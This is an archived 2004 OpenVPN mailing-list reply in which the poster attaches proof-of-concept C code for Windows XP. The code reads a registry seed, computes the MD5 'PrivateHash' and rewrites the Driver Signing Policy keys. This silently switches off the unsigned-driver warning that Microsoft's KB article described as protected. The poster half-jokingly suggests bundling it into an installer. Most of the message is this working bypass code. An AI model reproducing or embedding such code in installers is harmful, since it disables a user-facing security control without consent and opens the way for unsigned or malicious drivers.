[OpenVPN home] [Date Prev] [Date Index] [Date Next]
[OpenVPN mailing lists] [Thread Prev] [Thread Index] [Thread Next]
Google
 
Web openvpn.net

Re: [Openvpn-users] Re: Microsoft Logo Warning


  • Subject: Re: [Openvpn-users] Re: Microsoft Logo Warning
  • From: Stefan `Sec` Zehl <sec@xxxxxx>
  • Date: Mon, 15 Nov 2004 13:16:46 +0100
  • Accept-languages: de, en
  • I-love-doing-this: really

On Wed, Nov 10, 2004 at 01:38 -0700, Blaine Fleming wrote:
> 
> >...but then, I suppose that if you wanted to be evil, you could just
> >find the registry key that GUI setting twiddles, temporarily modify it
> >during the install process and put it back afterwards.
> 
> MS made sure it wasn't quite that easy...
> http://support.microsoft.com/?kbid=298503

I felt challenged by the wording in that KB article.

I present you with the attached Proof of concept C Code which can turn
the "Driver Signing" Setting on or off at will. The usual caveats apply
(it works on my machine: XP with SP2). Perhaps someone wants to include
it in the TAP installer :-)

CU,
    Sec
-- 
  "The General who in a hundred battles is always victorious is not as
  great as the one who achieves his objectives without fighting."
                                             -- Sun Tzu
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#define HP_HASHVALUE HP_HASHVAL

/* This program turns the Driver signing Policy On/Off for Windows XP */
 * Written by Stefan `Sec` Zehl <sec@xxxxxx>, 15.11.2004
 *
 * Thanks to sysinternals.com for regmon and apispy
 *        to msdn.microsoft.com for windows reference
 *        to cygwin for their environment
 */

void MyHandleError(char *s){
	printf("Error: %s, number %x\n.",s,(unsigned int)GetLastError());
	exit(1);
}
//--------------------------------------------------------------------
int main(void){
	HCRYPTPROV hCryptProv;
	HCRYPTHASH hHash;
	BYTE data[16];
	DWORD len;
	DWORD seed;
	HKEY hkey;
	BYTE onoff=0; // This is the On/Off toggle
	char input[4];
	int x;

	// HKLM\System\WPA\PnP\seed
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"System\\WPA\\PnP",
			0,
			KEY_READ,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey sucess\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegQueryValueEx(
			hkey,
			"seed",
			NULL,
			NULL,
			(BYTE*)&seed,
			&len
			)==ERROR_SUCCESS){
		printf("RegQueryValue sucess\n");
	}else{
		printf("RegQueryValue failure\n");
	};

	if(hkey)
		RegCloseKey(hkey);

	printf("Seed=%x\n",(unsigned int)seed);

	printf("Hello, World\n");
	if(CryptAcquireContext(
				&hCryptProv, 
				NULL, 
				NULL, 
				PROV_RSA_FULL, 
				0)) 
	{
		printf("CryptAcquireContext complete. \n");
	} else {
		MyHandleError("Acquisition of context failed.");
	}
	//--------------------------------------------------------------------
	// Create a hash object.

	if(CryptCreateHash(
				hCryptProv, 
				CALG_MD5, 
				0, 
				0, 
				&hHash)) 
	{
		printf("An empty hash object has been created. \n");
	} else {
		MyHandleError("Error during CryptBeginHash!\n");
	}
	//--------------------------------------------------------------------
	// Compute the cryptographic hash on the data.

	input[0]=0;
	input[1]=onoff; // This is the Value!
	input[2]=0;
	input[3]=0;

	if(CryptHashData(
			hHash,
			input,
			sizeof(input),
			0))
	{
		printf("The data has been hashed. \n");
	} else {
		MyHandleError("Error during CPHashData!\n");
	}
	//--------------------------------------------------------------------

	if(CryptHashData(
			hHash,
			(BYTE*)&seed,
			sizeof(seed),
			0))
	{
		printf("The data has been hashed. \n");
	} else {
		MyHandleError("Error during CPHashData!\n");
	}
	//--------------------------------------------------------------------
	len=sizeof(data);
	if( CryptGetHashParam(
			hHash,
			HP_HASHVALUE,
			data,
			&len,
			0))
	{
		printf("The hash has been retrieved. \n");
	} else {
		MyHandleError("Error during CPGetHashParam!\n");
	}

	//--------------------------------------------------------------------
	// Clean up.

	// Destroy the hash object.

	if(hHash) {
		if(!(CryptDestroyHash(hHash)))
			MyHandleError("Error during CryptDestroyHash");
	}

	// Release the CSP.

	if(hCryptProv) {
		if(!(CryptReleaseContext(hCryptProv,0)))
			MyHandleError("Error during CryptReleaseContext");
	}

	printf("Hash: ");
	for(x=0;x<sizeof(data);x++){
		printf("%x ",data[x]);
	};
	printf("\nCreate md5 hash completed without error. \n");

	//--------------------------------------------------------------------
	// HKLM\Software\Microsoft\Windows\CurrentVersion\Setup\PrivateHash
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey sucess\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"PrivateHash",
			0,
			REG_BINARY,
			data,
			sizeof(data)
			)==ERROR_SUCCESS){
		printf("RegSetValueEx sucess\n");
	}else{
		printf("RegSetValueEx failure\n");
	};

	if(hkey)
		RegCloseKey(hkey);
	//--------------------------------------------------------------------
	// HKLM\Software\Microsoft\Driver Signing\Policy
	if(RegOpenKeyEx(
			HKEY_CURRENT_USER,
			"Software\\Microsoft\\Driver Signing",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey sucess\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"Policy",
			0,
			REG_BINARY,
			&onoff,
			1
			)==ERROR_SUCCESS){
		printf("RegSetValueEx sucess\n");
	}else{
		printf("RegSetValueEx failure\n");
	};
	if(hkey)
		RegCloseKey(hkey);

	//--------------------------------------------------------------------
	// HKLM\Software\Microsoft\Driver Signing\Policy
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"Software\\Microsoft\\Driver Signing",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey sucess\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"Policy",
			0,
			REG_BINARY,
			&onoff,
			1
			)==ERROR_SUCCESS){
		printf("RegSetValueEx sucess\n");
	}else{
		printf("RegSetValueEx failure\n");
	};
	if(hkey)
		RegCloseKey(hkey);

	exit(0);
}